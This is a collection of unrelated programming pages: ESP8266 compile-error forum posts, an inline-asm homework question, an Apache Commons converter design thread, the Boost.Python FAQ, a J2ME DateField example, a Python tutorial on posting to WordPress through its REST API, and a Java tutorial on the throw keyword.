Arduino: 1.8.2 (Windows Store 1.8.3.0) (Windows 10), Board: "Generic ESP8266 Module, 80 MHz, 40MHz, DIO, 115200, 512K (64K SPIFFS), ck, Disabled, None"
C:\Users\Pavitar\Documents\Arduino\libraries\ESP8266HardwareSerial\ESP8266.cpp:22:26: fatal error: avr/pgmspace.h: No such file or directory
#include <avr/pgmspace.h>
^
compilation terminated.
exit status 1
Error compiling for board Generic ESP8266 Module.

did you get a solution? I'm also stuck at compilation errors. Do you have the board installed? Not sure why you would get that error. In doing some research on this, it looks like a legacy code issue, pointing at a hardcoded folder that is not always there. Try locating the ESP8266.cpp file on your computer and changing:

#include <avr/pgmspace.h>

to

#include <pgmspace.h>

I've had to hack the library files for some of the ESP modules that are not identified by the IDE as ESPs. Are we talking raw ESP8266 12F modules, or some board with the 12F and a USB-to-serial module? One of my major issues is also that I'm not able to program the ESP8266 independently. Of late it has always given me the following error, though it was working just fine before:

warning: espcomm_sync failed
error: espcomm_open failed
error: espcomm_upload_mem failed

I tried doing this, but it led to another error saying:

In file included from C:\Users\Pavitar\Documents\Arduino\libraries\Cayenne/CayenneESP8266Shield.h:24:0, from C:\Users\Pavitar\Desktop\esp8266cayenne\esp8266cayenne.ino:24:
C:\Users\Pavitar\Documents\Arduino\libraries\Cayenne/BlynkSimpleShieldEsp8266_HardSer.h:15:2: error: #error This code is not intended to run on the ESP8266 platform!
Please check your Tools->Board setting. #error This code is not intended to run on the ESP8266 platform! Please check your Tools->Board setting. ^
http://community.mydevices.com/t/wifishield-with-arduino-uno-compiling-error/1269?page=3
Hi everyone, I'm new to this site and hope you might be able to help me out. So I've been given an assignment to produce this output:

% ./hw4b foo
here foo and foo there
% ./hw4b ABC123
here ABC123 and ABC123 there
% ./hw4b 'where is'
here where is and where is there

using asm to insert the word/phrase, and only these libraries: stdlib.h, stdio.h, & string.h. I've already done most of the C coding (shown below) I think, but I'm stuck on the asm assembler code insertion.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char word[] = "here and there";
int sz;
int wordsz;
char *arg;
char *result;

int main(int argc, char* argv[])
{
    if (argc != 2) {
        printf("Usage: %s takes one string argument.\n", argv[0]);
        exit(1);
    }
    sz = strlen(argv[1]) + 1;
    arg = malloc(sz);
    strcpy(arg, argv[1]);
    wordsz = strlen(word) + 1;
    result = malloc(sz * wordsz);
    __asm__("\n\
        movl sz, %eax\n\
    ");
    printf("%s\n", result);
    return 0;
}

What I'm stuck on is the actual separating/parsing of the word(s) (delimited by the space ' ' character). I mean, I know that %eax can hold a long word (4 bytes), but if I recall correctly, single chars take up 1 byte each, so there is no register which can hold the entirety of word, never mind result. Any help would be greatly appreciated! Thank you
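Before dropping down to assembly, it can help to pin down exactly what the program must produce by prototyping the transformation in a high-level language. This is only a sketch of the expected output (judging from the sample runs above), not the required asm solution:

```python
def insert_between_words(arg, sentence="here and there"):
    # Join the words of the template sentence with the user-supplied
    # argument in between: "here ARG and ARG there".
    return (" " + arg + " ").join(sentence.split())

print(insert_between_words("foo"))  # here foo and foo there
```

Once the byte-level behavior is clear (walk `word` character by character, copying and emitting `arg` at each space), translating it into a register loop becomes much more tractable.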
https://www.daniweb.com/programming/software-development/threads/358099/need-help-with-asm-assembly-insert-in-my-c-code
OH> I had a look at your ideas and now I have a few questions and remarks.

Great!

OH> At first let me say that I like the idea of using a graph representation [...]

I definitely agree. Things get a lot easier that way. Besides, we could even support a special debug mode, where we plug in a graph renderer and thereby provide an image of the registered converters (just like the ones in the document I posted, and had drawn by hand). If a conversion succeeds we could provide an image of the path chosen (may be useful if an unexpected result pops up.)

OH> The idea to use a separate lookup class seems interesting, too. But
OH> after thinking a while about it I am not sure if this really helps [...]
OH> registry. So this would imply that for different lookup classes other
OH> data has to be stored in the registry. Can this be handled in a generic
OH> way or wouldn't it be better to leave the lookup mechanism in the
OH> registry and use different registry implementations?

In my current line of thought the registry and lookup are quite tightly coupled, but serve different purposes. The Registry is just plain storage, whereas the Lookup provides the algorithm(s?) to work on them. For example, the ClassConverterRegistry provides/should provide all Converters the Java language uses for a class (inheritance, toString()). But then again, something simpler like a Set or List might be better suited for that.

OH> 2. A lookup might be expensive, especially if a search in a complex
OH> graph has to be performed. So it might make sense to implement some
OH> caching functionality. I am not sure if this can be done efficiently in
OH> a lookup class implementation because in your example code always a new
OH> lookup instance is created (though I might miss something here).

You are right, the lookup should definitely be cached, but I didn't go that far in my implementation. I guess there are a number of things we can do, though I haven't thought them through yet.
First, we could build a single graph for a Lookup and incrementally extend it (there may be times when it has to be rebuilt, eg when a converter is removed, or the graph gets too big). Then, we could cache some paths, in case they are reused. The shortest path algorithm provides the shortest path to all destinations from a source, so this computation may somehow be reused, too.

OH> The approach with the Types handles inheritance, but does it cover all
OH> cases? I am not sure if the following use case could be handled: imagine
OH> a user has the classes A, B, C, and D with B and C extending A. Then
OH> there are special conversion implementations for A->D and B->D. If now
OH> an object of class C is provided, will then the A->D conversion be used?
OH> With other words: inheritance in direction towards the base classes is
OH> surely supported, but can derived classes be handled without extra means?

Yes. In my model, everything is a conversion, even inheritance, implementation of an interface, or the String conversion (toString) of any object. In your example, a chained converter would be built, to provide the conversion C -> A -> D. In the prototype, this is done via extension of the graph with the converters of the class C (see addTypeConverters for both the source and destination type). So, in the beginning you only have the converter A -> D, but as you ask for a conversion of an object of type C, the conversion C -> A is added.

public ExtendedConverter lookup(final Type sourceType, final Type destinationType)
        throws NoSuchConversionException {
    addTypeConverters(graph, sourceType);
    addTypeConverters(graph, destinationType);
    return new ChainedExtendedConverter(
        getConvertersForPath(getShortestPath(sourceType, destinationType)));
}

OH> What about structural conversions, e.g. a String[] to a int[] or a
OH> collection of Integers to a byte[]? Where would these conversions take
OH> place?
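The lookup idea discussed here — extend the graph with the source and destination types, then chain converters along the shortest path — can be illustrated with a small breadth-first search. This is only a rough Python illustration of the concept, not the Java implementation under discussion; the type names and graph representation are made up for the example:

```python
from collections import deque

def shortest_conversion_path(converters, source, destination):
    # converters maps a type to the set of types it can be converted
    # to (including "implicit" edges such as inheritance).
    queue = deque([[source]])
    seen = {source}
    while queue:
        path = queue.popleft()
        if path[-1] == destination:
            return path  # types along the shortest converter chain
        for nxt in converters.get(path[-1], ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None  # no conversion chain exists

# The C -> A -> D example from this thread: B and C extend A,
# and a converter A -> D is registered.
graph = {"C": {"A"}, "B": {"A"}, "A": {"D"}}
print(shortest_conversion_path(graph, "C", "D"))  # ['C', 'A', 'D']
```

A chained converter would then be built from the converters along the returned path, exactly as the prototype's ChainedExtendedConverter does.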
OH> (I think this is slightly different from constructing a chain of
OH> conversions because here a base conversion has to be performed multiple
OH> times.)

I started to think about that too, but postponed that for a version 2 of convert. Here is how far I got: I think it's better to think about String[] or int[] as a parametric type, like Array<String> or Array<int>. That way, it will be easier to think about conversions as Array<int> to List<Integer> (aside from supporting Java 1.5). Now, a converter needs to worry about the outer structure (Array -> List) and the meat (int -> Integer) (this would apply for other structures too, eg List -> Set). I could imagine an implementation like this:

public class ListToSetConverter extends AbstractConverter {

    final Type srcParam, destParam;

    public ListToSetConverter(final Type srcParam, final Type destParam) {
        this.srcParam = srcParam;
        this.destParam = destParam;
    }

    public Type getSourceType() {
        return Types.parse("List<*>", srcParam);
    }

    public Type getDestinationType() {
        return Types.parse("Set<*>", destParam);
    }

    protected ConversionContext convert(final ConversionContext context)
            throws NoSuchConversionException, ConversionFailedException {
        final Set s = new HashSet();
        for (final Iterator i = context.getValue(); i.hasNext();) {
            s.add(context.convert(i.next(), destParam));
        }
        return context.update(s, getDestinationType());
    }
}

"context.convert()" would provide access to the Lookup that found the converter, thereby allowing the converter to ask for conversions / call other converters. Then, "new ListToSetConverter(Integer.class, Integer.TYPE)" (or something like that) can be plugged into the graph, and be used like any other. (Of course, the Lookup must be prepared to handle parametric types, like the implicit LinkedList<Integer> -> List<Integer> -> List<Number> conversion).
OH> One last remark about the extended converter interface: I think I
OH> understand why this ConversionContext is needed - to allow a single
OH> object being treated as of different types. But I strongly agree with a
OH> statement mentioned on this thread: that the converter interface should
OH> be as simple as possible. So if it is possible, I would try to get rid
OH> off this additional complexity.

The ConversionContext would be used to supply additional information for a conversion. Currently, it only holds the perceived type and the object to convert, but could also include:

- a reference to the Lookup, to allow a converter to ask for other conversions
- an isCopy field, that states that the input object is a copy (maybe from another converter) and may be used for a "destructive" conversion, eg List<Integer> -> List<String> might simply transform the Integers to Strings in the List, without creating a new List.
- an isImmutable field, that states that the given input object may not be modified, even if the object is mutable.
- ...

I am quite a bit torn between the possible functionality that can be provided with this information, and the simplicity of the Converter interface. Maybe we could come up with some different Converter interfaces that get increasingly complex, and would be suitable for different situations. Adapters (with additional metadata) could be used to get from the simpler to the more complex converters. We could even provide a "dynamic converter adapter" that scans any given object for convert methods (eg, any method that starts with "convert") and provides adapters for them:

public class Any {
    public String convert(Integer i) throws SomeException { ... }
}

...getSourceType() -> Integer
...getDestinationType() -> String
...

Ron
http://mail-archives.apache.org/mod_mbox/commons-dev/200403.mbox/%3C1523221219.20040329170653@rblasch.org%3E
typedef boost::function<void (string s)> funcptr;

void foo(funcptr fp)
{
    fp("hello,world!");
}

BOOST_PYTHON_MODULE(test)
{
    def("foo", foo);
}

And then:

>>> def hello(s):
...     print s
...
>>> foo(hello)
hello, world!

The short answer is: "you can't". This is not a Boost.Python limitation so much as a limitation of C++. The problem is that a Python function is actually data, and the only way of associating data with a C++ function pointer is to store it in a static variable of the function. The problem with that is that you can only associate one piece of data with every C++ function, and we have no way of compiling a new C++ function on-the-fly for every Python function you decide to pass to foo. In other words, this could work if the C++ function is always going to invoke the same Python function, but you probably don't want that. (If you have the luxury of changing the C++ code you're wrapping, pass it an object instead and call that; the overloaded function call operator will invoke the Python function you pass it behind the object.)

- Break your source file up into multiple translation units.

my_module.cpp:

...
void more_of_my_module();

BOOST_PYTHON_MODULE(my_module)
{
    def("foo", foo);
    def("bar", bar);
    ...
    more_of_my_module();
}

more_of_my_module.cpp:

void more_of_my_module()
{
    def("baz", baz);
    ...
}

If you find that a class_<...> declaration can't fit in a single source file without triggering the error, you can always pass a reference to the class_ object to a function in another source file, and call some of its member functions (e.g. .def(...)) in the auxiliary source file:

more_of_my_class.cpp:

void more_of_my_class(class_<my_class>& x)
{
    x
        .def("baz", baz)
        .add_property("xx", &my_class::get_xx, &my_class::set_xx)
        ;
    ...
}

Greg Burley gives the following answer for Unix GCC users:

Once you have created a boost python extension for your c++ library or class, you may need to debug the code. After all, this is one of the reasons for wrapping the library in python. An expected side-effect or benefit of using BPL is that debugging should be isolated to the c++ library that is under test, given that python code is minimal and boost::python either works or it doesn't. (ie. While errors can occur when the wrapping method is invalid, most errors are caught by the compiler ;-). The basic steps required to initiate a gdb session to debug a c++ library via python are shown here. Note, however, that you should start the gdb session in the directory that contains your BPL my_ext.so module.

(gdb) target exec python
(gdb) run
>>> from my_ext import *
>>> [C-c]
(gdb) break MyClass::MyBuggyFunction
(gdb) cont
>>> pyobj = MyClass()
>>> pyobj.MyBuggyFunction()
Breakpoint 1, MyClass::MyBuggyFunction ...
Current language: auto; currently c++
(gdb) do debugging stuff

Greg's approach works even better using Emacs' "gdb" command, since it will show you each line of source as you step through it. On Windows, my favorite debugging solution is the debugger that comes with Microsoft Visual C++ 7. This debugger seems to work with code generated by all versions of Microsoft and Metrowerks toolsets; it's rock solid and "just works" without requiring any special tricks from the user. Raoul Gough has provided the following for gdb on Windows: gdb support for Windows DLLs has improved lately, so it is now possible to debug Python extensions using a few tricks. Firstly, you will need an up-to-date gdb with support for minimal symbol extraction from a DLL. Any gdb from version 6 onwards, or Cygwin gdb-20030214-1 and onwards should do. A suitable release will have a section in the gdb.info file under Configuration – Native – Cygwin Native – Non-debug DLL symbols.
Refer to that info section for more details of the procedures outlined here. Secondly, it seems necessary to set a breakpoint in the Python interpreter, rather than using ^C to break execution. A good place to set this breakpoint is PyOS_Readline, which will stop execution immediately before reading each interactive Python command. You have to let Python start once under the debugger, so that it loads its own DLL, before you can set the breakpoint:

$ gdb python
GNU gdb 2003-09-02-cvs (cygwin-special)
[...]
(gdb) run
Starting program: /cygdrive/c/Python22/python.exe
Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> ^Z

Program exited normally.
(gdb) break *&PyOS_Readline
Breakpoint 1 at 0x1e04eff0
(gdb) run
Starting program: /cygdrive/c/Python22/python.exe
Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.

Breakpoint 1, 0x1e04eff0 in python22!PyOS_Readline ()
   from /cygdrive/c/WINNT/system32/python22.dll
(gdb) cont
Continuing.
>>> from my_ext import *

Breakpoint 1, 0x1e04eff0 in python22!PyOS_Readline ()
   from /cygdrive/c/WINNT/system32/python22.dll
(gdb) # my_ext now loaded (with any debugging symbols it contains)

when you run your test, because Boost.Build will then show you the exact commands it uses to invoke it. This will invariably involve setting up PYTHONPATH and other important environment variables such as LD_LIBRARY_PATH which may be needed by your debugger in order to get things to work right.

Why doesn't my *= operator work?

Q: I have exported my class to python, with many overloaded operators. It works fine for me except the *= operator. It always tells me "can't multiply sequence with non int type". If I use p1.__imul__(p2) instead of p1 *= p2, it successfully executes my code. What's wrong with me?

A: There's nothing wrong with you. This is a bug in Python 2.2.
You can see the same effect in Pure Python (you can learn a lot about what's happening in Boost.Python by playing with new-style classes in Pure Python):

>>> class X(object):
...     def __imul__(self, x):
...         print 'imul'
...
>>> x = X()
>>> x *= 1

For several reasons Boost.Python does not support void * as an argument or as a return value. However, it is possible to wrap functions with void * arguments or return values using thin wrappers and the opaque pointer facility. E.g.:

// Declare the following in each translation unit
struct void_; // Deliberately do not define

BOOST_PYTHON_OPAQUE_SPECIALIZED_TYPE_ID(void_);

void *foo(int par1, void *par2);

void_ *foo_wrapper(int par1, void_ *par2)
{
    return (void_ *) foo(par1, par2);
}

...
BOOST_PYTHON_MODULE(bar)
{
    def("foo", &foo_wrapper);
}

28 January, 2004
http://www.boost.org/doc/libs/1_31_0/libs/python/doc/v2/faq.html
This example illustrates how to insert a date field in your form. We are using two fields of type DateField (datein and dateout) and a final static variable DATE initialized to 0. Both DateField variables are initialized in the constructor (DateFieldExample). When the application runs, the startApp() method is called first and displays the form with the datein and dateout fields. We use the java.util.Date class for the specific date, and the java.util.TimeZone class determines the displayed date format, like Tue, 30 Sep, 2008 in the figure. The application displays as follows: When <date> is selected, a new window will open with a calendar as given below, and you can select your choice of date, month and year, which will appear on the form as follows. The source code of DateFieldExample.java is as follows:

import javax.microedition.lcdui.*;
import javax.microedition.midlet.MIDlet;
import java.util.Date;
import java.util.TimeZone;

public class DateFieldExample extends MIDlet {
  private Form form;
  private Display display;
  private DateField datein, dateout;
  private static final int DATE = 0;

  public DateFieldExample() {
    datein = new DateField("Date In:", DateField.DATE,
        TimeZone.getTimeZone("GMT"));
    dateout = new DateField("Date Out:", DateField.DATE,
        TimeZone.getTimeZone("GMT"));
  }

  public void startApp() {
    display = Display.getDisplay(this);
    Form form = new Form("Date Field");
    form.append(datein);
    form.append(dateout);
    display.setCurrent(form);
  }

  public void pauseApp() {
  }

  public void destroyApp(boolean destroy) {
    notifyDestroyed();
  }
}
http://roseindia.net/j2me/date-field.shtml
The SEO community started to automate the boring stuff using Python and Node.js in the last two years. Automation can save you hundreds of hours of manual work, and sometimes it can be more accurate than human work. This tutorial will talk about automating one of the most boring tasks in our daily work: uploading content to WordPress. WordPress is one of the most popular CMSs globally, and you can use it for almost everything, from a news website to eCommerce to personal blogs. I decided to find a way to automate uploading content to WordPress, and I have built three websites using this method. The first one is Arab Crypto Cap. It's a website that provides cryptocurrency prices in Arabic using the CoinGecko API. The second one was for experimental purposes. I scraped the content from Healthline.com and published it. The third website is for providing nutrition facts about food. I gathered the data from different sources and published them with images using the Pexels API. All the websites I built using this method except Arab Crypto Cap are for experimental purposes, not generating revenue. The original sources of content are mentioned on each page. You can use this method to automate publishing content on WordPress if you have one of the below cases.

The WordPress REST API is an application programming interface that can connect your WordPress website with other applications, allowing you to interact with the WordPress core without touching the CMS. The most powerful thing here is that you can get the benefits of all WordPress core and plugins and connect them with other applications. And many other things you can achieve using the REST API. You only need an idea and data, and then you can automate your work using this method. In this tutorial, we will use Python to publish content on our WordPress website with the help of the REST API. It is very easy to use it to achieve many things and publish thousands of pages in hours.
Before we start, try this tutorial on a staging environment or your local machine. It's 100% safe and tested many times, but as usual, it is better to test locally and then move to the production environment. For this tutorial, we need only one plugin that allows our Python application to connect to our WordPress website using the REST API. This plugin is called Application Passwords. You can download it for free and install it on your website. In WordPress 5.6, this plugin has been merged into the core. You can download this plugin only from your WordPress plugins page, and you won't find it on wordpress.org. You can follow this guide to use the core feature. After installing the plugin, go to the Edit Profile page and scroll down to the bottom of the page. You will find a new field and button; add a name for your application and click on create a password. After clicking on Add New, a pop-up will appear with your application password, and this password will be used in our Python application. Make sure to store this password safely, don't share it with anyone, and remove this plugin when you are done with it. Make sure to install the below Python libraries on your machine:

import pandas as pd
import base64
import requests
from tqdm.notebook import tqdm
import json

To test the REST API on your WordPress website, go to this link, and you will see a JSON response in your browser. Change localhost/wordpress_local to your website name, for example:

Then in our Python application, we need to define a user, a password, and a link.
user = 'admin'
password = 'Cd4n 9jBk w9Bn hFoj yFDR Qchw'
url = ''

Encode the connection credentials of your WordPress website:

wp_connection = user + ':' + password
token = base64.b64encode(wp_connection.encode())

Prepare the header of our request:

headers = {'Authorization': 'Basic ' + token.decode('utf-8')}

Define a title for our first post:

post_title = "This is my first post using Python and REST API"

Define a body for our post:

post_body = "This is the body content of my first post and I am very happy"

Then we need to set the type of our post and assign the content values to it using a Python dictionary:

post = {'title': post_title,
        'status': 'publish',
        'content': post_body,
        'author': '1',
        'format': 'standard'
        }

Finally, we perform the request against the REST API to insert the post:

wp_request = requests.post(url + '/posts', headers=headers, json=post)

Now go to your WordPress posts list, and you should see your first post published. I am sure you are happy now, with ideas already rushing through your mind for creating websites and automating your work. Next we will create more posts, assign them to categories, and upload images. But before that, let's install some of the most popular WordPress plugins and see how the REST API and the WordPress core interact with each other. We will install the plugins below and use them later in our next project. Now we will build a project to experiment with many things using Python and WordPress. Our project will be about my country, Jordan, and will include articles about places and food dishes. I highly recommend you visit Jordan; we have many lovely places to visit and delicious food to eat, like Mansaf.
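The base64 step above can be wrapped in a small reusable helper. This is a sketch; the credentials shown are placeholders, not real ones:

```python
import base64

def wp_auth_header(user, app_password):
    # WordPress Application Passwords use standard HTTP Basic Auth:
    # base64-encode "user:password" and send it in the Authorization header.
    token = base64.b64encode(f"{user}:{app_password}".encode())
    return {"Authorization": "Basic " + token.decode("utf-8")}

# Placeholder credentials for illustration only.
headers = wp_auth_header("admin", "Cd4n 9jBk w9Bn hFoj yFDR Qchw")
```

Keeping this in one place makes it easy to rotate the application password later without touching the rest of the script.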
Our plan will be: Here we will add three categories manually to our WordPress website and will call them: In case you have many categories on your website, you can get the category IDs directly from the database to use in our Python script by running the queries below:

use wordpress_local;
show tables;
describe wp_terms;
select term_id, name from wp_terms;

Then extract them in CSV format. We will open a Google sheet and add three columns for the titles of our content and the categories assigned to them. There is no information on Wikipedia about Jordanian food, so I decided to add other types of food. Now export the Google sheet to a CSV file to use in our Python script. Next we will use the Wikipedia API to get content about our topics. I will leave you with a tutorial from our friend Jean Christophe Chouinard; he has a whole article about the Wikipedia API and its use. Read and display our data in a Pandas data frame, then define a function to get the data from Wikipedia:

def get_wiki(title):
    subject = title
    url = ''
    params = {
        'action': 'query',
        'format': 'json',
        'titles': subject,
        'prop': 'extracts',
        'exintro': True,
        'explaintext': True,
    }
    response = requests.get(url, params=params)
    data = response.json()
    page = next(iter(data['query']['pages'].values()))
    try:
        return page["extract"]
    except KeyError:
        return "No Wiki Data"

Loop over the titles and pass them to the Wikipedia function:

data["Wikipedia English Description"] = data["Title"].apply(lambda title: get_wiki(title))

And now we have our data from the Wikipedia API.
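The term IDs extracted from wp_terms have to be matched to the category names typed into the sheet. A hypothetical sketch of that mapping; the names and IDs below are assumptions for illustration, so substitute the values from your own database:

```python
# Map sheet category names to WordPress term IDs (assumed values).
CATEGORY_IDS = {"Places": 2, "Food": 3, "Drinks": 4}

def category_id(name):
    # Fall back to WordPress's default "Uncategorized" term (ID 1)
    # when a sheet row uses a name we don't recognise.
    return CATEGORY_IDS.get(name, 1)
```

A column like data["Category ID"] = data["Category Name"].apply(category_id) can then carry the ID the post-insertion request needs.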
The next step is to translate the content and the titles to Spanish:

from deep_translator import GoogleTranslator

def translate_content(original_text, language):
    translated_content = GoogleTranslator(source='auto', target=language).translate(original_text)
    return translated_content

data["Spanish Title"] = data["Title"].apply(lambda title: translate_content(title, "es"))
data["Spanish Wikipedia Description"] = data["Wikipedia English Description"].apply(lambda description: translate_content(description, "es"))

Now we have the original content and the translation in the same data frame. It's time to get free high-quality images from the Pexels API. It is a website that provides free high-quality images that you can use on your website without attribution to the owner. Sign up on their website and get an API key; it is free and easy to use. We will use our English titles to get images from the API; sometimes you can't find exactly the images you want, so the API returns the most relevant images for your keyword. In the API request, we pass our category and title so that the API can fetch images from the most relevant category. Steps to get images: request the image from the API:

def get_pixabay_image(row):
    item_name = row["Title"].replace(" ", "+")
    category = row["Category Name"]
    url = f"{item_name}&image_type=photo&orientation=all&category={category}&safesearch=true&order=popular&per_page=3"
    page = requests.get(url)
    json_data = page.json()
    try:
        image_url = json_data["hits"][0]["largeImageURL"]
        return image_url
    except (KeyError, IndexError):
        return "No Image"

data["Pixels Image URL"] = data.apply(lambda row: get_pixabay_image(row), axis=1)

Now we have the image URLs. Replace xxxxx with your API key. Next we will download the images to our machine and reduce the quality to 70% to shrink the file size. Create a new folder named images where your script is placed.
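A query string like the one above can also be assembled with the standard library so that spaces and special characters are escaped automatically. This is a sketch; the endpoint and the key parameter name mirror the Pixabay-style parameters in the snippet but are assumptions, not confirmed by the article:

```python
from urllib.parse import urlencode

def build_image_query(api_key, title, category):
    # urlencode escapes each value, so titles with spaces or accents
    # don't need manual replace(" ", "+") handling.
    params = {
        "key": api_key,          # assumed key parameter name
        "q": title,
        "image_type": "photo",
        "orientation": "all",
        "category": category,
        "safesearch": "true",
        "order": "popular",
        "per_page": 3,
    }
    return "https://pixabay.com/api/?" + urlencode(params)
```

Building the URL this way also keeps the API key out of an f-string scattered through the code.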
Inside it, create two more folders for the original and optimized images and call them big and small:

from PIL import Image

def download_image(row):
    # Download image
    response = requests.get(row["Pixels Image URL"])
    image_name = row["Spanish Title"].lower().replace(" ", "-")
    file = open(f"images/big/{image_name}.jpg", "wb")
    file.write(response.content)
    file.close()
    # Convert image quality
    image_file = Image.open(f"images/big/{image_name}.jpg")
    image_file = image_file.convert('RGB')
    image_file.save(f"images/small/{image_name}.jpg", quality=70)

def generate_images(row):
    if row["Pixels Image URL"] != "No Image":
        download_image(row)
        return row["Spanish Title"].lower().replace(" ", "-") + ".jpg"
    else:
        return "No Image"

data["Local Image Path"] = data.apply(lambda row: generate_images(row), axis=1)

Results images

Now we are ready to upload the content to WordPress. We have the translated content and the optimized images:

def wp_insert(post_title, post_content, category, image_path):
    media = {
        'file': open("images/small/" + image_path, 'rb'),
    }
    image = requests.post(url + '/media', headers=headers, files=media)
    imageID = str(json.loads(image.content)['id'])
    post = {'title': post_title,
            'status': 'publish',
            'content': post_content,
            'categories': category,
            'featured_media': imageID,
            'author': '1',
            'format': 'standard'
            }
    wp_insert_request = requests.post(url + '/posts', headers=headers, json=post)

for index, row in tqdm(data.iterrows()):
    if row["Local Image Path"] == "No Image":
        continue  # skip rows without a downloaded image
    wp_insert(row["Spanish Title"], row["Spanish Wikipedia Description"], row["Category ID"], row["Local Image Path"])

print("Done")

And now all your posts are published on your website, with the images optimized by the image-optimization plugin we installed.

Homepage content

You can find the complete script in this Google Colab Notebook. If you have any questions, feel free to reach out to me on my LinkedIn Profile.
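One note on the filename handling above: title.lower().replace(" ", "-") breaks on accented or punctuated Spanish titles. A slightly more robust slug helper, offered as a sketch rather than part of the original script:

```python
import re

def slugify(title):
    # Lowercase, trim, strip punctuation, and collapse whitespace
    # and underscores into single dashes.
    slug = title.lower().strip()
    slug = re.sub(r"[^\w\s-]", "", slug, flags=re.UNICODE)  # drop punctuation
    return re.sub(r"[\s_]+", "-", slug)                      # spaces -> dashes
```

Swapping this in for the inline replace() calls keeps the big/ and small/ filenames consistent with each other.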
https://www.nadeem.tech/wordpress-publishing-automation-with-python/
In all of the earlier exception-handling programs, you will have seen that the Java runtime system was responsible for identifying the exception class, creating its object, and throwing that object. The JVM automatically throws such system-generated exceptions; they are called implicit exceptions. If we want to throw an exception manually, or explicitly, Java provides the keyword throw.

Throw Keyword in Java

throw in Java is a keyword used to throw a built-in exception or a custom exception explicitly (manually). Using the throw keyword, we can throw either checked or unchecked exceptions in a Java program. When an exception occurs in the try block, the throw keyword transfers control of execution to the caller by throwing an exception object. Only one exception object can be thrown by a throw keyword at a time. The throw keyword can be used inside a method or a static block, provided that exception handling is present. The syntax to throw an exception manually is as follows:

Syntax:

throw exception_name;

where exception_name is a reference to an object of the Throwable class or one of its subclasses. For example:

throw new ArithmeticException();

or

ArithmeticException ae = new ArithmeticException();
throw ae;

throw new NumberFormatException();

Key points:
1. An object of the Throwable class or its subclasses can be created using the new keyword or obtained from a parameter inside a catch clause.
2. Instances of classes other than Throwable or its subclasses cannot be used as exception objects.

Control flow of try-catch block with throw statement in Java

When a throw statement is encountered in a program, execution of the subsequent statements in the try block stops immediately and the corresponding catch block is searched for. The nearest try block is inspected to see whether it has a catch block matching the type of the exception. If a corresponding catch block is found, it is executed; otherwise control is transferred to the next enclosing try block.
If no matching catch block is found, the JVM transfers control to the default exception handler, which stops the normal flow of the program and displays an error message on the output screen.

Java Throw Exception Example Program

In this section, we will see how to throw an exception in Java manually. Let's take an example program that throws an exception using the new keyword.

Program source code 1:

public class ThrowTest1 {
    public static void main(String[] args) {
        try {
            ArithmeticException a = new ArithmeticException("Hello from throw");
            throw a; // Exception thrown explicitly.
            // The two statements above can also be written in one line like this:
            // throw new ArithmeticException("Hello from throw");
        } catch (ArithmeticException ae) {
            System.out.println("ArithmeticException caught: \n" + ae);
            System.out.println(ae.getMessage());
        }
    }
}

Output:
ArithmeticException caught:
java.lang.ArithmeticException: Hello from throw
Hello from throw

Explanation: In the main() method of class ThrowTest1, the try block creates an object of the ArithmeticException class with reference variable a, passing a String argument to its constructor. The exception object is then thrown by the statement throw a;. The thrown exception object is caught by the corresponding catch block and stored in ae. The call ae.getMessage() displays the string message appended to the internally generated message.

Program source code 2:

public class ThrowTest2 {
    public static void main(String[] args) {
        int x = 20;
        int y = 0;
        try {
            int z = x / y; // Exception occurred.
            System.out.println("Result: " + z);
            throw new ArithmeticException();
        } catch (ArithmeticException ae) {
            System.out.println("Exception caught: \n" + ae);
        }
    }
}

Output:
Exception caught:
java.lang.ArithmeticException: / by zero

As you can see, when the exception occurred at the division, the rest of the code in the try block did not execute.
Program source code 3:

public class ThrowTest3 {
    public static void main(String[] args) {
        int x = 20;
        int y = 0;
        try {
            int z = x / y;
            throw new ArithmeticException();
            System.out.println("Result: " + z); // Unreachable code.
        } catch (ArithmeticException ae) {
            System.out.println("Exception caught: \n" + ae);
        }
    }
}

Output:
Exception in thread "main" java.lang.Error: Unresolved compilation problem: Unreachable code

In the preceding program, we wrote a statement after the throw statement, which makes it unreachable code, so the program could not be compiled.

Program source code 4:

public class ThrowTest4 {
    public static void main(String[] args) {
        int num = 1;
        for (num = 1; num <= 10; num++) {
            try {
                if (num == 5)
                    throw new ArithmeticException("ArithmeticException");
                else if (num < 2)
                    throw new RuntimeException("RuntimeException");
                else if (num > 9)
                    throw new NullPointerException("NullPointerException");
            } catch (Exception e) {
                System.out.println("Caught an exception");
                System.out.println(e.getMessage());
            }
        }
    }
}

Output:
Caught an exception
RuntimeException
Caught an exception
ArithmeticException
Caught an exception
NullPointerException

Program source code 5:

class Test1 extends Exception { }
class Test2 extends Exception { }
class Test3 extends Exception { }

public class ThrowTest5 {
    public static void main(String[] args) {
        int num = 1;
        for (num = 1; num <= 10; num++) {
            try {
                if (num == 5)
                    throw new Test1();
                else if (num < 2)
                    throw new Test2();
                else if (num > 9)
                    throw new Test3();
            } catch (Exception e) {
                System.out.println("Caught an exception");
            }
        }
    }
}

Output:
Caught an exception
Caught an exception
Caught an exception

Rethrowing an Exception in Java

Java 7 improved support for rethrowing exceptions (the "more precise rethrow" feature). When an exception occurs in a try block, it is caught by a catch block inside the same method. The same exception object can then be rethrown out of the catch block explicitly using the throw keyword. This is called rethrowing an exception in Java.
When the same exception object is rethrown, it preserves the details of the original exception. The following code snippet shows how to rethrow the same exception object out of a catch block:

try {
    // Code that might throw an exception.
} catch (Exception e) {
    // Rethrow the same exception.
    throw e;
}

Let's take an example program where we throw a StringIndexOutOfBoundsException. This exception generally occurs when a string index is out of range.

Program source code 6:

public class A {
    void m1() {
        try {
            // Taking a string with 9 chars; their indexes run from 0 to 8.
            String str = "Scientech";
            char ch = str.charAt(10); // Exception is thrown because there is no index 10.
        } catch (StringIndexOutOfBoundsException se) {
            System.out.println("String index out of range");
            throw se; // Rethrow the same exception.
        }
    }
}

public class B {
    public static void main(String[] args) {
        // Create an object of class A and call the m1() method.
        A a = new A();
        try {
            a.m1();
        }
        // The rethrown exception is caught by the catch block below.
        catch (StringIndexOutOfBoundsException se) {
            System.out.println("Rethrown exception is caught here: " + se);
        }
    }
}

